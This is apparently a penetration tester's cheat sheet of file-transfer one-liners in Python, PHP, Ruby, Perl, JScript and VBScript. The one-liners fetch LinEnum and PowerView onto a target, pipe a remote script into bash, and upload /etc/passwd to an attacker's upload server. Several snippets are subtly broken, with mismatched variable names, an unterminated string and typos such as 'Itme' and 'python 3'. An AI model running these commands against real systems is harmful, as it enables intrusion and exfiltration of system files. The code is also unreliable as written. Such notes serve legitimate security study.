# Python - invoke urllib python module with a one-liner using the -c flag ## Python 2 - Download ```bash python2.7 -c 'import urllib; urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' #one-liner for URL retrieval #alternatively, this python module can be invoked in the interactive python sub-shell as shown in [MODULE] ``` ## Python 3 - Downloads ```bash python3 -c 'import urllib.request; urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' #one-liner for URL retrieval ``` ## python3 - Uploads ```bash #setup uploadserver python module python3 -m uploadserver pipx run uploadserver #alternative to the above ``` ```bash #one-liner to send file to uploadserver python 3 -c 'import requests; requests.post("http://<uploadserver_ip>:8000/upload",files={"files":open("/etc/passwd","rb")})' ``` - breaking down the one-liner within a script ```python import requests #import request module to use the associated function URL = "http://<uploadserver_ip>:8000/upload #define target for upload file = open("/etc/passwd", "rb") #define the file we want ot read, open it and save it in a variable r = requests.post(url,files={"files":file}) #use request sfunction to submit a POST request to upload the file to the target ``` # PHP - common server-side programming language for websites ## PHP Download with File_get_contents() Module ```php php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);' ``` ## PHP Download with Fopen() Module ```php php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' ``` ## PHP Download to File | to BASH ```php php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash ``` # Other Languages - Ruby and Perl are other popular languages that can be used for file downloads ## Ruby - Downloads ```ruby ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))' ``` ## Perl - Downloads ```perl perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");' ``` ## Javascript - Downloads - scripting language that allows for the implementation of complex features on web pages ```javascript #nominally called wget.js for downloading a file var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); ``` ```cmd #execute wget.js on Windows with cscript.exe; can also use powershell cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 ``` ## VBScript - Downloads - Microsoft Visual Basic Scripting Edition is an active scripting language modeled on visual basic - VBScript has been installed by default in every Windows desktop release since Windows 98 ```vbscript #nomially called wget.vbs for downloasing a file dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrem: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrem .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Itme(1), 2 end with ``` ```cmd #execute wget.vbs on Windows with cscript.exe; can also use powershell cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 ```